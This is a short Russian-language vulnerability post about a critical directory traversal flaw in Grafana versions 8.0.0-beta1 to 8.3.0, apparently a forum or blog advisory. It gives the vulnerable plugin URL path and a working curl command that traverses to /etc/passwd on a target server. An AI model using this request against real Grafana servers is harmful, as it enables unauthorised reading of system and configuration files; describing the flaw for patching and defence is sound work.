
Автор: PrivacyHunter
Затронутые версии: с Grafana 8.0.0-beta1 по 8.3.0 (за исключением исправленных версий)
Тип уязвимости: Directory Traversal (Обход каталога)
Уровень опасности: Критический (Critical)
Платформа: Grafana (платформа с открытым исходным кодом для мониторинга и наблюдаемости)
⚠️ Подробности уязвимости В Grafana обход каталога может быть выполнен через следующий URL:
Код http://<grafana_host>/public/plugins// С помощью этого атакующий может читать локальные файлы на сервере. Например, несанкционированный доступ к /etc/passwd или конфигурационным файлам.
🔥 Пример эксплуатации Чтение файла с помощью простого запроса:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd С помощью приведённого выше запроса можно получить список пользователей в системе Linux.